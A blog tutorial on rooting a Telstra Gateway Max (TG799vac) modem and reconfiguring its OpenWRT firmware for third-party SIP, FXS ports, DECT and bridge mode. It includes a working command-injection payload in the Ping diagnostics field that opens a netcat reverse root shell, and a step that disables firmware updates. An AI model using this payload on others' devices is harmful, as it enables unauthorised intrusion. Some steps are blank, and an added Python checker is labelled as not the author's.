The TG799vac, known more commonly in Australia as the “Telstra Gateway Max”, is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, two FXS ports for analogue phones, and an FXO port.
They are supplied directly to Telstra, and as such carry Telstra-branded firmware. There is no ‘generic’ firmware available that will simply give you access to the modem as with any other device you would purchase. Personally, I think this kind of sucks: if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, the DECT base station and the FXO port. That was the motivation to crack into this device and re-enable as many features as possible.
By default, the IP address of the modem will be 10.0.0.138. In this example, I use a desktop on 10.0.0.122.
First, we have to exploit the web interface to get root access to the device. This is done through a flaw in the IPv6 address validation of the web interface, which lets the web server run arbitrary commands. This is good, as otherwise none of the rest would be possible.
Getting root access
On your desktop, open a listening port. Make sure your desktop firewall allows the inbound connection.
# nc -lvvp 10001
Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10.0.0.122 10001 -e /bin/sh
If your modem doesn’t display the Diagnostics tile, you can use Firebug or something similar (F12 in Internet Explorer) to inspect the DOM of the main page of the modem GUI with all the “tiles” on it, and change one of the existing “tiles” in the GUI (such as “Management”) from
<div class="settings" id="Management" data-remote="modals/usermgr-modal.lp" data-toggle="modal" data-id="usermgr-modal"></div>
<div class="settings" id="Diagnostics" data-remote="modals/diagnostics-xdsl-modal.lp" data-toggle="modal" data-id="diagnostics-xdsl-modal"></div>
Exit the DOM inspector and click on the “Management” tile as if you were entering the Management page. It should load the Diag page instead.
If all goes well, your modem will now connect to your desktop – and make available a root shell for you. NOTE: At this point, you won’t see any type of shell prompt, or error messages – so while you’ll get output of commands, it can get a little confusing.
First steps – change the root password, get dropbear (the SSH server) to run on boot – NOTE the lack of prompt:
Changing password for root
Password for root changed by root
echo 'dropbear &' > /etc/rc.local
You should now be able to SSH into your modem on the LAN IP with the username root and the password you set above.
$ ssh root@10.0.0.138
root@10.0.0.138's password:

BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)

  _______                   __             __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |  _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|

        N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
   NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
   * 1 oz Vodka            Pour all ingredients into mixing
   * 1 oz Triple Sec       tin with ice, strain into glass.
   * 1 oz Orange juice
 --------------------------------------------------------------------
 Product: vant-f_telstra
 Release: Aqua (16.3)
 Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
 Hash config: 887a8c777ed8527277d7137ed9149816c889cf1d
 Hash openwrt: ca2463af2522fc727150f23d6e85005112e8e8eb
 Hash kernel: b295f29cce441d87cef07373bfb07b546f720db3
 Hash technicolor: 021884ac6200cd08635043046d33a717336a3554
 Hash mindspeed: 91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
 Hash lte: cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
 Hash routing: 7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
 Hash custo: 85da3def73fee4e92f478d2b1afafdfc16235a81
 Hash packages: 0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
 Bootloader: 2.0.54
root@mygateway:~#
You’ll note straight away that the firmware is based on OpenWRT. This is always good – as it means that the majority of the OpenWRT configuration is applicable directly to this modem.
Disable software updates
A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest editing /etc/config/cwmpd so that upgrades are unmanaged and the ACS URL line is commented out, as follows:
option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'
I also recommend disabling the service:
# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable
Using bridge mode with dedicated PPPoE ethernet port
I use the device’s access point on my LAN, but I also run the modem purely in bridge mode, which means I want to dedicate a port to my router so it can do PPPoE to my ISP. Thankfully, standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:
config interface 'adsl_wan'
    option type 'bridge'
    option ip6hint '0'
    option force_link '0'
    list ifname 'eth4'
    list ifname 'eth3'
    list ifname 'atm_8_35'
    list ifname 'ptm0'
You’ll need to remove eth3 from the LAN VLAN, otherwise it would sit in both bridges. This gives you the port right next to the WAN ethernet port (that is eth3; eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to get the WAN port to do this, as it seems to be configured differently, maybe at the switch level.
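The two edits above, commenting out the ACS URL in /etc/config/cwmpd and moving eth3 out of the LAN bridge, are easy to get half right. This added Python example (not code from the original post) parses UCI-style config text and checks both conditions; the sample configs are constructed, and the cwmpd section name used in them is an assumption.

```python
"""Parse OpenWrt UCI files and check two items from the notes above: eth3 must
not sit in both the 'lan' and 'adsl_wan' bridges, and /etc/config/cwmpd must no
longer be able to pull a firmware image. Added example, not the post's own code."""
import re

UCI_LINE = re.compile(r"^(config|option|list)\s+(\S+)(?:\s+'([^']*)')?$")

def parse_uci(text):
    """Return [(section_type, section_name, {key: value or [values]})]; '#' lines are skipped as UCI does."""
    sections = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = UCI_LINE.match(line)
        if not m:
            raise ValueError("unparseable UCI line: " + raw)
        kind, key, val = m.groups()
        if kind == "config":
            sections.append((key, val, {}))
        elif kind == "option":
            sections[-1][2][key] = val
        else:  # repeated 'list' keys accumulate
            sections[-1][2].setdefault(key, []).append(val)
    return sections

def ports_in_two_bridges(sections):
    """Interfaces under more than one bridge: eth3 left in 'lan' would join the LAN to the DSL side."""
    owner, clashes = {}, set()
    for typ, name, opts in sections:
        if typ == "interface" and opts.get("type") == "bridge":
            for ifname in opts.get("ifname", []):
                if owner.setdefault(ifname, name) != name:
                    clashes.add(ifname)
    return sorted(clashes)

def cwmp_upgrades_blocked(sections):
    """True only if no active acs_url survives and upgradesmanaged is '0'."""
    opts = {k: v for _, _, o in sections for k, v in o.items()}
    return "acs_url" not in opts and opts.get("upgradesmanaged") == "0"
# Constructed samples (section name 'cwmpd_config' is assumed, not from the post).
NETWORK_BEFORE = ("config interface 'lan'\n option type 'bridge'\n list ifname 'eth3'\n"
                  "config interface 'adsl_wan'\n option type 'bridge'\n"
                  " list ifname 'eth4'\n list ifname 'eth3'\n list ifname 'ptm0'\n")
CWMPD_AFTER = ("config cwmpd 'cwmpd_config'\n option upgradesmanaged '0'\n"
               " #option acs_url 'https://acs.example.invalid'\n")
if __name__ == "__main__":
    print("ports in two bridges:", ports_in_two_bridges(parse_uci(NETWORK_BEFORE)))
    print("cwmpd upgrades blocked:", cwmp_upgrades_blocked(parse_uci(CWMPD_AFTER)))
```

Run it against your own /etc/config/network and /etc/config/cwmpd copied off the device to confirm the state before rebooting.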
Enable web interface features
If you have the modem in bridge mode, the web interface is gutted compared to in routed mode.
Edit /www/lua/cards_limiter.lua and change the following function to:
function M.card_limited(info, cardname)
  -- Display all cards. Lua only allows 'return' as the last statement of a
  -- block, so the early return is wrapped in do ... end to keep the file valid.
  do return false end
  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end
Restart the web interface via: /etc/init.d/nginx restart
Configure a third party SIP provider
Edit /etc/config/mmpbxrvsipnet and use the following guide:
Under the heading sip_net, set:
Under the heading sip_profile_0, set:
Restart the mmpbxd service via /etc/init.d/mmpbxd restart
If you have multiple SIP accounts to log into – and with different providers, you can duplicate the entire sip_net section under a different name and configure as per above. Set the profile network setting to point to the new section you have created.
Enable the FXS ports
To enable the FXS ports, set the relay_state parameter to ‘1’ in /etc/config/mmpbxbrcmfxsdev, e.g. for FXS port 2:
config device 'fxs_dev_0'
    option user_friendly_name 'Phone 1'
    option comfort_noise 'silence'
    option echo_cancellation '1'
    option fax_transport 'inband_renegotiation'
    option t38_redundancy '1'
    option rtcp_interval '5000'
    #list codec_black_list 'G722'
    #list codec_black_list 'AMR-WB'
    option cw_cas_delay '758'
    option fxs_privacy_reason 'P'
    option fxs_unavailability_reason 'O'
    option fxs_port '2'
    option cid_display_date_enabled '1'
    option cid_display_calling_line_enabled '1'
    option cid_display_calling_party_name_enabled '1'
    option pos '0'
    option early_detect_faxmodem '0'
    option relay_state '1'
SIP call routing
Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section against sip_profile_0 and edit as needed. This is my setup to route sip_profile_1 to the first registered DECT device – and FXS port 1:
config incoming_map
    option profile 'sip_profile_0'
    list device 'fxs_dev_0'
    list device 'dect_dev_1'
    list device 'dect_dev_2'
    list device 'dect_dev_3'
    list device 'dect_dev_4'
    list device 'dect_dev_5'
    list device 'sip_dev_0'
    list device 'sip_dev_1'
    list device 'sip_dev_2'
    list device 'sip_dev_3'
    list device 'sip_dev_4'
    list device 'sip_dev_5'
    list device 'sip_dev_6'

config incoming_map
    option profile 'sip_profile_1'
    list device 'dect_dev_0'
    list device 'fxs_dev_1'
Registering DECT handsets
After enabling all the ‘cards’ via the web interface, the easy way is to start DECT pairing via the web interface. Click on the Telephony card, then ‘Start’ the pairing and follow the instructions for your handset. This was straightforward for me.
Speeding up sync times
If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a – so we can disable other modes in /etc/config/xdsl:
config xdsl 'dsl0'
    #list multimode 'gdmt'
    #list multimode 'adsl2annexm'
    #list multimode 'adsl2plus'
    list multimode 'vdsl2'
    #list profile '8a'
    #list profile '8b'
    #list profile '8c'
    #list profile '8d'
    #list profile '12a'
    #list profile '12b'
    list profile '17a'
    option enabled '1'
    option eoc_vendor_id 'BETMMB'
    option handshake_switch_timeout '0'
    option demod_cap_value '0x90447a'
    option demod_cap_mask '0x90447a'
    option demod_cap2_value '0x790000'
    option demod_cap2_mask '0x790000'
    option aux_features_value '0x1064003'
    option aux_features_mask '0x1064003'
    option vdsl_cfg_flags_value '0x1200e00'
    option vdsl_cfg_flags_mask '0x1200000'
    option xdsl_cfg1_value '0x0'
    option xdsl_cfg1_mask '0x0'
    option xdsl_cfg2_value '0x0'
    option xdsl_cfg2_mask '0x0'
    option maxaggrdatarate '160000'
    option maxdsdatarate '110000'
    option maxusdatarate '40000'
    option eoc_serial_number 'YeahRight 799vac 16.3'
Changing max sync speeds
In /etc/config/xdsl, you can change the max values for sync speeds. The value maxusdatarate controls the upstream maximum sync speed, maxdsdatarate controls the downstream maximum sync speed, and maxaggrdatarate is the maximum combined speed. The defaults are listed above. This doesn’t change any limitations imposed by line length – or at the DSLAM.
Serial console
A serial console can be added using a 3.3 V to RS232 adapter; these can be found on eBay quite cheaply. The serial header is J5 on the board, and as the picture below shows, R327 and R328 need to be solder-bridged to pass the serial signals to the adapter. In the pictures shown, Black = Ground, Yellow = RX and Green = TX.
2017-09-02 – Initial revision of this document.
2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.
2017-10-20 – Add workaround for diagnostics tile thanks to NetSicK
2017-11-20 – Add serial console details thanks to Matt.